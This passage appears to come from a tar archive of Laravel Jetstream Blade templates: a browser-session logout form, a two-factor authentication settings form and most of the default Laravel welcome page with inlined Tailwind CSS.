</x-slot> <x-slot name="content"> <div class="max-w-xl text-sm text-gray-600"> {{ __('If necessary, you may log out of all of your other browser sessions across all of your devices. Some of your recent sessions are listed below; however, this list may not be exhaustive. If you feel your account has been compromised, you should also update your password.') }} </div> @if (count($this->sessions) > 0) <div class="mt-5 space-y-6"> <!-- Other Browser Sessions --> @foreach ($this->sessions as $session) <div class="flex items-center"> <div> @if ($session->agent->isDesktop()) <svg xmlns="http://www.w3.org/2000/svg" fill="none" viewBox="0 0 24 24" stroke-width="1.5" stroke="currentColor" class="w-8 h-8 text-gray-500"> <path stroke-linecap="round" stroke-linejoin="round" d="M9 17.25v1.007a3 3 0 01-.879 2.122L7.5 21h9l-.621-.621A3 3 0 0115 18.257V17.25m6-12V15a2.25 2.25 0 01-2.25 2.25H5.25A2.25 2.25 0 013 15V5.25m18 0A2.25 2.25 0 0018.75 3H5.25A2.25 2.25 0 003 5.25m18 0V12a2.25 2.25 0 01-2.25 2.25H5.25A2.25 2.25 0 013 12V5.25" /> </svg> @else <svg xmlns="http://www.w3.org/2000/svg" fill="none" viewBox="0 0 24 24" stroke-width="1.5" stroke="currentColor" class="w-8 h-8 text-gray-500"> <path stroke-linecap="round" stroke-linejoin="round" d="M10.5 1.5H8.25A2.25 2.25 0 006 3.75v16.5a2.25 2.25 0 002.25 2.25h7.5A2.25 2.25 0 0018 20.25V3.75a2.25 2.25 0 00-2.25-2.25H13.5m-3 0V3h3V1.5m-3 0h3m-3 18.75h3" /> </svg> @endif </div> <div class="ml-3"> <div class="text-sm text-gray-600"> {{ $session->agent->platform() ? $session->agent->platform() : __('Unknown') }} - {{ $session->agent->browser() ? $session->agent->browser() : __('Unknown') }} </div> <div> <div class="text-xs text-gray-500"> {{ $session->ip_address }}, @if ($session->is_current_device) <span class="text-green-500 font-semibold">{{ __('This device') }}</span> @else {{ __('Last active') }} {{ $session->last_active }} @endif </div> </div> </div> </div> @endforeach </div> @endif <div class="flex items-center mt-5"> <x-button wire:click="confirmLogout" wire:loading.attr="disabled"> {{ __('Log Out Other Browser Sessions') }} </x-button> <x-action-message class="ml-3" on="loggedOut"> {{ __('Done.') }} </x-action-message> </div> <!-- Log Out Other Devices Confirmation Modal --> <x-dialog-modal wire:model="confirmingLogout"> <x-slot name="title"> {{ __('Log Out Other Browser Sessions') }} </x-slot> <x-slot name="content"> {{ __('Please enter your password to confirm you would like to log out of your other browser sessions across all of your devices.') }} <div class="mt-4" x-data="{}" x-on:confirming-logout-other-browser-sessions.window="setTimeout(() => $refs.password.focus(), 250)"> <x-input type="password" class="mt-1 block w-3/4" autocomplete="current-password" placeholder="{{ __('Password') }}" x-ref="password" wire:model.defer="password" wire:keydown.enter="logoutOtherBrowserSessions" /> <x-input-error for="password" class="mt-2" /> </div> </x-slot> <x-slot name="footer"> <x-secondary-button wire:click="$toggle('confirmingLogout')" wire:loading.attr="disabled"> {{ __('Cancel') }} </x-secondary-button> <x-button class="ml-3" wire:click="logoutOtherBrowserSessions" wire:loading.attr="disabled"> {{ __('Log Out Other Browser Sessions') }} </x-button> </x-slot> </x-dialog-modal> </x-slot> </x-action-section> �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/profile/two-factor-authentication-form.blade.php����������������������������������������������0000644�����������������00000012725�14765366572�0017217 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������<x-action-section> <x-slot name="title"> {{ __('Two Factor Authentication') }} </x-slot> <x-slot name="description"> {{ __('Add additional security to your account using two factor authentication.') }} </x-slot> <x-slot name="content"> <h3 class="text-lg font-medium text-gray-900"> @if ($this->enabled) @if ($showingConfirmation) {{ __('Finish enabling two factor authentication.') }} @else {{ __('You have enabled two factor authentication.') }} @endif @else {{ __('You have not enabled two factor authentication.') }} @endif </h3> <div class="mt-3 max-w-xl text-sm text-gray-600"> <p> {{ __('When two factor authentication is enabled, you will be prompted for a secure, random token during authentication. You may retrieve this token from your phone\'s Google Authenticator application.') }} </p> </div> @if ($this->enabled) @if ($showingQrCode) <div class="mt-4 max-w-xl text-sm text-gray-600"> <p class="font-semibold"> @if ($showingConfirmation) {{ __('To finish enabling two factor authentication, scan the following QR code using your phone\'s authenticator application or enter the setup key and provide the generated OTP code.') }} @else {{ __('Two factor authentication is now enabled. Scan the following QR code using your phone\'s authenticator application or enter the setup key.') }} @endif </p> </div> <div class="mt-4"> {!! $this->user->twoFactorQrCodeSvg() !!} </div> <div class="mt-4 max-w-xl text-sm text-gray-600"> <p class="font-semibold"> {{ __('Setup Key') }}: {{ decrypt($this->user->two_factor_secret) }} </p> </div> @if ($showingConfirmation) <div class="mt-4"> <x-label for="code" value="{{ __('Code') }}" /> <x-input id="code" type="text" name="code" class="block mt-1 w-1/2" inputmode="numeric" autofocus autocomplete="one-time-code" wire:model.defer="code" wire:keydown.enter="confirmTwoFactorAuthentication" /> <x-input-error for="code" class="mt-2" /> </div> @endif @endif @if ($showingRecoveryCodes) <div class="mt-4 max-w-xl text-sm text-gray-600"> <p class="font-semibold"> {{ __('Store these recovery codes in a secure password manager. They can be used to recover access to your account if your two factor authentication device is lost.') }} </p> </div> <div class="grid gap-1 max-w-xl mt-4 px-4 py-4 font-mono text-sm bg-gray-100 rounded-lg"> @foreach (json_decode(decrypt($this->user->two_factor_recovery_codes), true) as $code) <div>{{ $code }}</div> @endforeach </div> @endif @endif <div class="mt-5"> @if (! $this->enabled) <x-confirms-password wire:then="enableTwoFactorAuthentication"> <x-button type="button" wire:loading.attr="disabled"> {{ __('Enable') }} </x-button> </x-confirms-password> @else @if ($showingRecoveryCodes) <x-confirms-password wire:then="regenerateRecoveryCodes"> <x-secondary-button class="mr-3"> {{ __('Regenerate Recovery Codes') }} </x-secondary-button> </x-confirms-password> @elseif ($showingConfirmation) <x-confirms-password wire:then="confirmTwoFactorAuthentication"> <x-button type="button" class="mr-3" wire:loading.attr="disabled"> {{ __('Confirm') }} </x-button> </x-confirms-password> @else <x-confirms-password wire:then="showRecoveryCodes"> <x-secondary-button class="mr-3"> {{ __('Show Recovery Codes') }} </x-secondary-button> </x-confirms-password> @endif @if ($showingConfirmation) <x-confirms-password wire:then="disableTwoFactorAuthentication"> <x-secondary-button wire:loading.attr="disabled"> {{ __('Cancel') }} </x-secondary-button> </x-confirms-password> @else <x-confirms-password wire:then="disableTwoFactorAuthentication"> <x-danger-button wire:loading.attr="disabled"> {{ __('Disable') }} </x-danger-button> </x-confirms-password> @endif @endif </div> </x-slot> </x-action-section> �������������������������������������������views/welcome.blade.php�����������������������������������������������������������������������������0000644�����������������00000065512�14765366572�0011151 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������<!DOCTYPE html> <html lang="{{ str_replace('_', '-', app()->getLocale()) }}"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>Laravel</title> <!-- Fonts --> <link rel="preconnect" href="https://fonts.bunny.net"> <link href="https://fonts.bunny.net/css?family=figtree:400,600&display=swap" rel="stylesheet" /> <!-- Styles --> <style> /* ! tailwindcss v3.2.4 | MIT License | https://tailwindcss.com */*,::after,::before{box-sizing:border-box;border-width:0;border-style:solid;border-color:#e5e7eb}::after,::before{--tw-content:''}html{line-height:1.5;-webkit-text-size-adjust:100%;-moz-tab-size:4;tab-size:4;font-family:Figtree, sans-serif;font-feature-settings:normal}body{margin:0;line-height:inherit}hr{height:0;color:inherit;border-top-width:1px}abbr:where([title]){-webkit-text-decoration:underline dotted;text-decoration:underline dotted}h1,h2,h3,h4,h5,h6{font-size:inherit;font-weight:inherit}a{color:inherit;text-decoration:inherit}b,strong{font-weight:bolder}code,kbd,pre,samp{font-family:ui-monospace, SFMono-Regular, Menlo, Monaco, Consolas, "Liberation Mono", "Courier New", monospace;font-size:1em}small{font-size:80%}sub,sup{font-size:75%;line-height:0;position:relative;vertical-align:baseline}sub{bottom:-.25em}sup{top:-.5em}table{text-indent:0;border-color:inherit;border-collapse:collapse}button,input,optgroup,select,textarea{font-family:inherit;font-size:100%;font-weight:inherit;line-height:inherit;color:inherit;margin:0;padding:0}button,select{text-transform:none}[type=button],[type=reset],[type=submit],button{-webkit-appearance:button;background-color:transparent;background-image:none}:-moz-focusring{outline:auto}:-moz-ui-invalid{box-shadow:none}progress{vertical-align:baseline}::-webkit-inner-spin-button,::-webkit-outer-spin-button{height:auto}[type=search]{-webkit-appearance:textfield;outline-offset:-2px}::-webkit-search-decoration{-webkit-appearance:none}::-webkit-file-upload-button{-webkit-appearance:button;font:inherit}summary{display:list-item}blockquote,dd,dl,figure,h1,h2,h3,h4,h5,h6,hr,p,pre{margin:0}fieldset{margin:0;padding:0}legend{padding:0}menu,ol,ul{list-style:none;margin:0;padding:0}textarea{resize:vertical}input::placeholder,textarea::placeholder{opacity:1;color:#9ca3af}[role=button],button{cursor:pointer}:disabled{cursor:default}audio,canvas,embed,iframe,img,object,svg,video{display:block;vertical-align:middle}img,video{max-width:100%;height:auto}[hidden]{display:none}*, ::before, ::after{--tw-border-spacing-x:0;--tw-border-spacing-y:0;--tw-translate-x:0;--tw-translate-y:0;--tw-rotate:0;--tw-skew-x:0;--tw-skew-y:0;--tw-scale-x:1;--tw-scale-y:1;--tw-pan-x: ;--tw-pan-y: ;--tw-pinch-zoom: ;--tw-scroll-snap-strictness:proximity;--tw-ordinal: ;--tw-slashed-zero: ;--tw-numeric-figure: ;--tw-numeric-spacing: ;--tw-numeric-fraction: ;--tw-ring-inset: ;--tw-ring-offset-width:0px;--tw-ring-offset-color:#fff;--tw-ring-color:rgb(59 130 246 / 0.5);--tw-ring-offset-shadow:0 0 #0000;--tw-ring-shadow:0 0 #0000;--tw-shadow:0 0 #0000;--tw-shadow-colored:0 0 #0000;--tw-blur: ;--tw-brightness: ;--tw-contrast: ;--tw-grayscale: ;--tw-hue-rotate: ;--tw-invert: ;--tw-saturate: ;--tw-sepia: ;--tw-drop-shadow: ;--tw-backdrop-blur: ;--tw-backdrop-brightness: ;--tw-backdrop-contrast: ;--tw-backdrop-grayscale: ;--tw-backdrop-hue-rotate: ;--tw-backdrop-invert: ;--tw-backdrop-opacity: ;--tw-backdrop-saturate: ;--tw-backdrop-sepia: }::-webkit-backdrop{--tw-border-spacing-x:0;--tw-border-spacing-y:0;--tw-translate-x:0;--tw-translate-y:0;--tw-rotate:0;--tw-skew-x:0;--tw-skew-y:0;--tw-scale-x:1;--tw-scale-y:1;--tw-pan-x: ;--tw-pan-y: ;--tw-pinch-zoom: ;--tw-scroll-snap-strictness:proximity;--tw-ordinal: ;--tw-slashed-zero: ;--tw-numeric-figure: ;--tw-numeric-spacing: ;--tw-numeric-fraction: ;--tw-ring-inset: ;--tw-ring-offset-width:0px;--tw-ring-offset-color:#fff;--tw-ring-color:rgb(59 130 246 / 0.5);--tw-ring-offset-shadow:0 0 #0000;--tw-ring-shadow:0 0 #0000;--tw-shadow:0 0 #0000;--tw-shadow-colored:0 0 #0000;--tw-blur: ;--tw-brightness: ;--tw-contrast: ;--tw-grayscale: ;--tw-hue-rotate: ;--tw-invert: ;--tw-saturate: ;--tw-sepia: ;--tw-drop-shadow: ;--tw-backdrop-blur: ;--tw-backdrop-brightness: ;--tw-backdrop-contrast: ;--tw-backdrop-grayscale: ;--tw-backdrop-hue-rotate: ;--tw-backdrop-invert: ;--tw-backdrop-opacity: ;--tw-backdrop-saturate: ;--tw-backdrop-sepia: }::backdrop{--tw-border-spacing-x:0;--tw-border-spacing-y:0;--tw-translate-x:0;--tw-translate-y:0;--tw-rotate:0;--tw-skew-x:0;--tw-skew-y:0;--tw-scale-x:1;--tw-scale-y:1;--tw-pan-x: ;--tw-pan-y: ;--tw-pinch-zoom: ;--tw-scroll-snap-strictness:proximity;--tw-ordinal: ;--tw-slashed-zero: ;--tw-numeric-figure: ;--tw-numeric-spacing: ;--tw-numeric-fraction: ;--tw-ring-inset: ;--tw-ring-offset-width:0px;--tw-ring-offset-color:#fff;--tw-ring-color:rgb(59 130 246 / 0.5);--tw-ring-offset-shadow:0 0 #0000;--tw-ring-shadow:0 0 #0000;--tw-shadow:0 0 #0000;--tw-shadow-colored:0 0 #0000;--tw-blur: ;--tw-brightness: ;--tw-contrast: ;--tw-grayscale: ;--tw-hue-rotate: ;--tw-invert: ;--tw-saturate: ;--tw-sepia: ;--tw-drop-shadow: ;--tw-backdrop-blur: ;--tw-backdrop-brightness: ;--tw-backdrop-contrast: ;--tw-backdrop-grayscale: ;--tw-backdrop-hue-rotate: ;--tw-backdrop-invert: ;--tw-backdrop-opacity: ;--tw-backdrop-saturate: ;--tw-backdrop-sepia: }.relative{position:relative}.mx-auto{margin-left:auto;margin-right:auto}.mx-6{margin-left:1.5rem;margin-right:1.5rem}.ml-4{margin-left:1rem}.mt-16{margin-top:4rem}.mt-6{margin-top:1.5rem}.mt-4{margin-top:1rem}.-mt-px{margin-top:-1px}.mr-1{margin-right:0.25rem}.flex{display:flex}.inline-flex{display:inline-flex}.grid{display:grid}.h-16{height:4rem}.h-7{height:1.75rem}.h-6{height:1.5rem}.h-5{height:1.25rem}.min-h-screen{min-height:100vh}.w-auto{width:auto}.w-16{width:4rem}.w-7{width:1.75rem}.w-6{width:1.5rem}.w-5{width:1.25rem}.max-w-7xl{max-width:80rem}.shrink-0{flex-shrink:0}.scale-100{--tw-scale-x:1;--tw-scale-y:1;transform:translate(var(--tw-translate-x), var(--tw-translate-y)) rotate(var(--tw-rotate)) skewX(var(--tw-skew-x)) skewY(var(--tw-skew-y)) scaleX(var(--tw-scale-x)) scaleY(var(--tw-scale-y))}.grid-cols-1{grid-template-columns:repeat(1, minmax(0, 1fr))}.items-center{align-items:center}.justify-center{justify-content:center}.gap-6{gap:1.5rem}.gap-4{gap:1rem}.self-center{align-self:center}.rounded-lg{border-radius:0.5rem}.rounded-full{border-radius:9999px}.bg-gray-100{--tw-bg-opacity:1;background-color:rgb(243 244 246 / var(--tw-bg-opacity))}.bg-white{--tw-bg-opacity:1;background-color:rgb(255 255 255 / var(--tw-bg-opacity))}.bg-red-50{--tw-bg-opacity:1;background-color:rgb(254 242 242 / var(--tw-bg-opacity))}.bg-dots-darker{background-image:url("data:image/svg+xml,%3Csvg width='30' height='30' viewBox='0 0 30 30' fill='none' xmlns='http://www.w3.org/2000/svg'%3E%3Cpath d='M1.22676 0C1.91374 0 2.45351 0.539773 2.45351 1.22676C2.45351 1.91374 1.91374 2.45351 1.22676 2.45351C0.539773 2.45351 0 1.91374 0 1.22676C0 0.539773 0.539773 0 1.22676 0Z' fill='rgba(0,0,0,0.07)'/%3E%3C/svg%3E")}.from-gray-700\/50{--tw-gradient-from:rgb(55 65 81 / 0.5);--tw-gradient-to:rgb(55 65 81 / 0);--tw-gradient-stops:var(--tw-gradient-from), var(--tw-gradient-to)}.via-transparent{--tw-gradient-to:rgb(0 0 0 / 0);--tw-gradient-stops:var(--tw-gradient-from), transparent, var(--tw-gradient-to)}.bg-center{background-position:center}.stroke-red-500{stroke:#ef4444}.stroke-gray-400{stroke:#9ca3af}.p-6{padding:1.5rem}.px-6{padding-left:1.5rem;padding-right:1.5rem}.text-center{text-align:center}.text-right{text-align:right}.text-xl{font-size:1.25rem;line-height:1.75rem}.text-sm{font-size:0.875rem;line-height:1.25rem}.font-semibold{font-weight:600}.leading-relaxed{line-height:1.625}.text-gray-600{--tw-text-opacity:1;color:rgb(75 85 99 / var(--tw-text-opacity))}.text-gray-900{--tw-text-opacity:1;color:rgb(17 24 39 / var(--tw-text-opacity))}.text-gray-500{--tw-text-opacity:1;color:rgb(107 114 128 / var(--tw-text-opacity))}.underline{-webkit-text-decoration-line:underline;text-decoration-line:underline}.antialiased{-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale}.shadow-2xl{--tw-shadow:0 25px 50px -12px rgb(0 0 0 / 0.25);--tw-shadow-colored:0 25px 50px -12px var(--tw-shadow-color);box-shadow:var(--tw-ring-offset-shadow, 0 0 #0000), var(--tw-ring-shadow, 0 0 #0000), var(--tw-shadow)}.shadow-gray-500\/20{--tw-shadow-color:rgb(107 114 128 / 0.2);--tw-shadow:var(--tw-shadow-colored)}.transition-all{transition-property:all;transition-timing-function:cubic-bezier(0.4, 0, 0.2, 1);transition-duration:150ms}.selection\:bg-red-500 *::selection{--tw-bg-opacity:1;background-color:rgb(239 68 68 / var(--tw-bg-opacity))}.selection\:text-white *::selection{--tw-text-opacity:1;color:rgb(255 255 255 / var(--tw-text-opacity))}.selection\:bg-red-500::selection{--tw-bg-opacity:1;background-color:rgb(239 68 68 / var(--tw-bg-opacity))}.selection\:text-white::selection{--tw-text-opacity:1;color:rgb(255 255 255 / var(--tw-text-opacity))}.hover\:text-gray-900:hover{--tw-text-opacity:1;color:rgb(17 24 39 / var(--tw-text-opacity))}.hover\:text-gray-700:hover{--tw-text-opacity:1;color:rgb(55 65 81 / var(--tw-text-opacity))}.focus\:rounded-sm:focus{border-radius:0.125rem}.focus\:outline:focus{outline-style:solid}.focus\:outline-2:focus{outline-width:2px}.focus\:outline-red-500:focus{outline-color:#ef4444}.group:hover .group-hover\:stroke-gray-600{stroke:#4b5563}@media (prefers-reduced-motion: no-preference){.motion-safe\:hover\:scale-\[1\.01\]:hover{--tw-scale-x:1.01;--tw-scale-y:1.01;transform:translate(var(--tw-translate-x), var(--tw-translate-y)) rotate(var(--tw-rotate)) skewX(var(--tw-skew-x)) skewY(var(--tw-skew-y)) scaleX(var(--tw-scale-x)) scaleY(var(--tw-scale-y))}}@media (prefers-color-scheme: dark){.dark\:bg-gray-900{--tw-bg-opacity:1;background-color:rgb(17 24 39 / var(--tw-bg-opacity))}.dark\:bg-gray-800\/50{background-color:rgb(31 41 55 / 0.5)}.dark\:bg-red-800\/20{background-color:rgb(153 27 27 / 0.2)}.dark\:bg-dots-lighter{background-image:url("data:image/svg+xml,%3Csvg width='30' height='30' viewBox='0 0 30 30' fill='none' xmlns='http://www.w3.org/2000/svg'%3E%3Cpath d='M1.22676 0C1.91374 0 2.45351 0.539773 2.45351 1.22676C2.45351 1.91374 1.91374 2.45351 1.22676 2.45351C0.539773 2.45351 0 1.91374 0 1.22676C0 0.539773 0.539773 0 1.22676 0Z' fill='rgba(255,255,255,0.07)'/%3E%3C/svg%3E")}.dark\:bg-gradient-to-bl{background-image:linear-gradient(to bottom left, var(--tw-gradient-stops))}.dark\:stroke-gray-600{stroke:#4b5563}.dark\:text-gray-400{--tw-text-opacity:1;color:rgb(156 163 175 / var(--tw-text-opacity))}.dark\:text-white{--tw-text-opacity:1;color:rgb(255 255 255 / var(--tw-text-opacity))}.dark\:shadow-none{--tw-shadow:0 0 #0000;--tw-shadow-colored:0 0 #0000;box-shadow:var(--tw-ring-offset-shadow, 0 0 #0000), var(--tw-ring-shadow, 0 0 #0000), var(--tw-shadow)}.dark\:ring-1{--tw-ring-offset-shadow:var(--tw-ring-inset) 0 0 0 var(--tw-ring-offset-width) var(--tw-ring-offset-color);--tw-ring-shadow:var(--tw-ring-inset) 0 0 0 calc(1px + var(--tw-ring-offset-width)) var(--tw-ring-color);box-shadow:var(--tw-ring-offset-shadow), var(--tw-ring-shadow), var(--tw-shadow, 0 0 #0000)}.dark\:ring-inset{--tw-ring-inset:inset}.dark\:ring-white\/5{--tw-ring-color:rgb(255 255 255 / 0.05)}.dark\:hover\:text-white:hover{--tw-text-opacity:1;color:rgb(255 255 255 / var(--tw-text-opacity))}.group:hover .dark\:group-hover\:stroke-gray-400{stroke:#9ca3af}}@media (min-width: 640px){.sm\:fixed{position:fixed}.sm\:top-0{top:0px}.sm\:right-0{right:0px}.sm\:ml-0{margin-left:0px}.sm\:flex{display:flex}.sm\:items-center{align-items:center}.sm\:justify-center{justify-content:center}.sm\:justify-between{justify-content:space-between}.sm\:text-left{text-align:left}.sm\:text-right{text-align:right}}@media (min-width: 768px){.md\:grid-cols-2{grid-template-columns:repeat(2, minmax(0, 1fr))}}@media (min-width: 1024px){.lg\:gap-8{gap:2rem}.lg\:p-8{padding:2rem}} </style> </head> <body class="antialiased"> <div class="relative sm:flex sm:justify-center sm:items-center min-h-screen bg-dots-darker bg-center bg-gray-100 selection:bg-red-500 selection:text-white"> @if (Route::has('login')) <div class="sm:fixed sm:top-0 sm:right-0 p-6 text-right"> @auth <a href="{{ url('/dashboard') }}" class="font-semibold text-gray-600 hover:text-gray-900 focus:outline focus:outline-2 focus:rounded-sm focus:outline-red-500">Dashboard</a> @else <a href="{{ route('login') }}" class="font-semibold text-gray-600 hover:text-gray-900 focus:outline focus:outline-2 focus:rounded-sm focus:outline-red-500">Log in</a> @if (Route::has('register')) <a href="{{ route('register') }}" class="ml-4 font-semibold text-gray-600 hover:text-gray-900 focus:outline focus:outline-2 focus:rounded-sm focus:outline-red-500">Register</a> @endif @endauth </div> @endif <div class="max-w-7xl mx-auto p-6 lg:p-8"> <div class="flex justify-center"> <svg viewBox="0 0 62 65" fill="none" xmlns="http://www.w3.org/2000/svg" class="h-16 w-auto bg-gray-100"> <path d="M61.8548 14.6253C61.8778 14.7102 61.8895 14.7978 61.8897 14.8858V28.5615C61.8898 28.737 61.8434 28.9095 61.7554 29.0614C61.6675 29.2132 61.5409 29.3392 61.3887 29.4265L49.9104 36.0351V49.1337C49.9104 49.4902 49.7209 49.8192 49.4118 49.9987L25.4519 63.7916C25.3971 63.8227 25.3372 63.8427 25.2774 63.8639C25.255 63.8714 25.2338 63.8851 25.2101 63.8913C25.0426 63.9354 24.8666 63.9354 24.6991 63.8913C24.6716 63.8838 24.6467 63.8689 24.6205 63.8589C24.5657 63.8389 24.5084 63.8215 24.456 63.7916L0.501061 49.9987C0.348882 49.9113 0.222437 49.7853 0.134469 49.6334C0.0465019 49.4816 0.000120578 49.3092 0 49.1337L0 8.10652C0 8.01678 0.0124642 7.92953 0.0348998 7.84477C0.0423783 7.8161 0.0598282 7.78993 0.0697995 7.76126C0.0884958 7.70891 0.105946 7.65531 0.133367 7.6067C0.152063 7.5743 0.179485 7.54812 0.20192 7.51821C0.230588 7.47832 0.256763 7.43719 0.290416 7.40229C0.319084 7.37362 0.356476 7.35243 0.388883 7.32751C0.425029 7.29759 0.457436 7.26518 0.498568 7.2415L12.4779 0.345059C12.6296 0.257786 12.8015 0.211853 12.9765 0.211853C13.1515 0.211853 13.3234 0.257786 13.475 0.345059L25.4531 7.2415H25.4556C25.4955 7.26643 25.5292 7.29759 25.5653 7.32626C25.5977 7.35119 25.6339 7.37362 25.6625 7.40104C25.6974 7.43719 25.7224 7.47832 25.7523 7.51821C25.7735 7.54812 25.8021 7.5743 25.8196 7.6067C25.8483 7.65656 25.8645 7.70891 25.8844 7.76126C25.8944 7.78993 25.9118 7.8161 25.9193 7.84602C25.9423 7.93096 25.954 8.01853 25.9542 8.10652V33.7317L35.9355 27.9844V14.8846C35.9355 14.7973 35.948 14.7088 35.9704 14.6253C35.9792 14.5954 35.9954 14.5692 36.0053 14.5405C36.0253 14.4882 36.0427 14.4346 36.0702 14.386C36.0888 14.3536 36.1163 14.3274 36.1375 14.2975C36.1674 14.2576 36.1923 14.2165 36.2272 14.1816C36.2559 14.1529 36.292 14.1317 36.3244 14.1068C36.3618 14.0769 36.3942 14.0445 36.4341 14.0208L48.4147 7.12434C48.5663 7.03694 48.7383 6.99094 48.9133 6.99094C49.0883 6.99094 49.2602 7.03694 49.4118 7.12434L61.3899 14.0208C61.4323 14.0457 61.4647 14.0769 61.5021 14.1055C61.5333 14.1305 61.5694 14.1529 61.5981 14.1803C61.633 14.2165 61.6579 14.2576 61.6878 14.2975C61.7103 14.3274 61.7377 14.3536 61.7551 14.386C61.7838 14.4346 61.8 14.4882 61.8199 14.5405C61.8312 14.5692 61.8474 14.5954 61.8548 14.6253ZM59.893 27.9844V16.6121L55.7013 19.0252L49.9104 22.3593V33.7317L59.8942 27.9844H59.893ZM47.9149 48.5566V37.1768L42.2187 40.4299L25.953 49.7133V61.2003L47.9149 48.5566ZM1.99677 9.83281V48.5566L23.9562 61.199V49.7145L12.4841 43.2219L12.4804 43.2194L12.4754 43.2169C12.4368 43.1945 12.4044 43.1621 12.3682 43.1347C12.3371 43.1097 12.3009 43.0898 12.2735 43.0624L12.271 43.0586C12.2386 43.0275 12.2162 42.9888 12.1887 42.9539C12.1638 42.9203 12.1339 42.8916 12.114 42.8567L12.1127 42.853C12.0903 42.8156 12.0766 42.7707 12.0604 42.7283C12.0442 42.6909 12.023 42.656 12.013 42.6161C12.0005 42.5688 11.998 42.5177 11.9931 42.4691C11.9881 42.4317 11.9781 42.3943 11.9781 42.3569V15.5801L6.18848 12.2446L1.99677 9.83281ZM12.9777 2.36177L2.99764 8.10652L12.9752 13.8513L22.9541 8.10527L12.9752 2.36177H12.9777ZM18.1678 38.2138L23.9574 34.8809V9.83281L19.7657 12.2459L13.9749 15.5801V40.6281L18.1678 38.2138ZM48.9133 9.14105L38.9344 14.8858L48.9133 20.6305L58.8909 14.8846L48.9133 9.14105ZM47.9149 22.3593L42.124 19.0252L37.9323 16.6121V27.9844L43.7219 31.3174L47.9149 33.7317V22.3593ZM24.9533 47.987L39.59 39.631L46.9065 35.4555L36.9352 29.7145L25.4544 36.3242L14.9907 42.3482L24.9533 47.987Z" fill="#FF2D20"/> </svg> </div> <div class="mt-16"> <div class="grid grid-cols-1 md:grid-cols-2 gap-6 lg:gap-8"> <a href="https://laravel.com/docs" class="scale-100 p-6 bg-white from-gray-700/50 via-transparent rounded-lg shadow-2xl shadow-gray-500/20 flex motion-safe:hover:scale-[1.01] transition-all duration-250 focus:outline focus:outline-2 focus:outline-red-500"> <div> <div class="h-16 w-16 bg-red-50 flex items-center justify-center rounded-full"> <svg xmlns="http://www.w3.org/2000/svg" fill="none" viewBox="0 0 24 24" stroke-width="1.5" class="w-7 h-7 stroke-red-500"> <path stroke-linecap="round" stroke-linejoin="round" d="M12 6.042A8.967 8.967 0 006 3.75c-1.052 0-2.062.18-3 .512v14.25A8.987 8.987 0 016 18c2.305 0 4.408.867 6 2.292m0-14.25a8.966 8.966 0 016-2.292c1.052 0 2.062.18 3 .512v14.25A8.987 8.987 0 0018 18a8.967 8.967 0 00-6 2.292m0-14.25v14.25" /> </svg> </div> <h2 class="mt-6 text-xl font-semibold text-gray-900">Documentation</h2> <p class="mt-4 text-gray-500 text-sm leading-relaxed"> Laravel has wonderful documentation covering every aspect of the framework. Whether you are a newcomer or have prior experience with Laravel, we recommend reading our documentation from beginning to end. </p> </div> <svg xmlns="http://www.w3.org/2000/svg" fill="none" viewBox="0 0 24 24" stroke-width="1.5" class="self-center shrink-0 stroke-red-500 w-6 h-6 mx-6"> <path stroke-linecap="round" stroke-linejoin="round" d="M4.5 12h15m0 0l-6.75-6.75M19.5 12l-6.75 6.75" /> </svg> </a> <a href="https://laracasts.com" class="scale-100 p-6 bg-white from-gray-700/50 via-transparent rounded-lg shadow-2xl shadow-gray-500/20 flex motion-safe:hover:scale-[1.01] transition-all duration-250 focus:outline focus:outline-2 focus:outline-red-500"> <div> <div class="h-16 w-16 bg-red-50 flex items-center justify-center rounded-full"> <svg xmlns="http://www.w3.org/2000/svg" fill="none" viewBox="0 0 24 24" stroke-width="1.5" class="w-7 h-7 stroke-red-500"> <path stroke-linecap="round" d="M15.75 10.5l4.72-4.72a.75.75 0 011.28.53v11.38a.75.75 0 01-1.28.53l-4.72-4.72M4.5 18.75h9a2.25 2.25 0 002.25-2.25v-9a2.25 2.25 0 00-2.25-2.25h-9A2.25 2.25 0 002.25 7.5v9a2.25 2.25 0 002.25 2.25z" /> </svg> </div> <h2 class="mt-6 text-xl font-semibold text-gray-900">Laracasts</h2> <p class="mt-4 text-gray-500 text-sm leading-relaxed"> Laracasts offers thousands of video tutorials on Laravel, PHP, and JavaScript development. Check them out, see for yourself, and massively level up your development skills in the process. </p> </div> <svg xmlns="http://www.w3.org/2000/svg" fill="none" viewBox="0 0 24 24" stroke-width="1.5" class="self-center shrink-0 stroke-red-500 w-6 h-6 mx-6"> <path stroke-linecap="round" stroke-linejoin="round" d="M4.5 12h15m0 0l-6.75-6.75M19.5 12l-6.75 6.75" /> </svg> </a> <a href="https://laravel-news.com" class="scale-100 p-6 bg-white from-gray-700/50 via-transparent rounded-lg shadow-2xl shadow-gray-500/20 flex motion-safe:hover:scale-[1.01] transition-all duration-250 focus:outline focus:outline-2 focus:outline-red-500"> <div> <div class="h-16 w-16 bg-red-50 flex items-center justify-center rounded-full"> <svg xmlns="http://www.w3.org/2000/svg" fill="none" viewBox="0 0 24 24" stroke-width="1.5" class="w-7 h-7 stroke-red-500"> <path stroke-linecap="round" stroke-linejoin="round" d="M12 7.5h1.5m-1.5 3h1.5m-7.5 3h7.5m-7.5 3h7.5m3-9h3.375c.621 0 1.125.504 1.125 1.125V18a2.25 2.25 0 01-2.25 2.25M16.5 7.5V18a2.25 2.25 0 002.25 2.25M16.5 7.5V4.875c0-.621-.504-1.125-1.125-1.125H4.125C3.504 3.75 3 4.254 3 4.875V18a2.25 2.25 0 002.25 2.25h13.5M6 7.5h3v3H6v-3z" /> </svg> </div> <h2 class="mt-6 text-xl font-semibold text-gray-900">Laravel News</h2> <p class="mt-4 text-gray-500 text-sm leading-relaxed"> Laravel News is a community driven portal and newsletter aggregating all of the latest and most important news in the Laravel ecosystem, including new package releases and tutorials. </p> </div> <svg xmlns="http://www.w3.org/2000/svg" fill="none" viewBox="0 0 24 24" stroke-width="1.5" class="self-center shrink-0 stroke-red-500 w-6 h-6 mx-6"> <path stroke-linecap="round" stroke-linejoin="round" d="M4.5 12h15m0 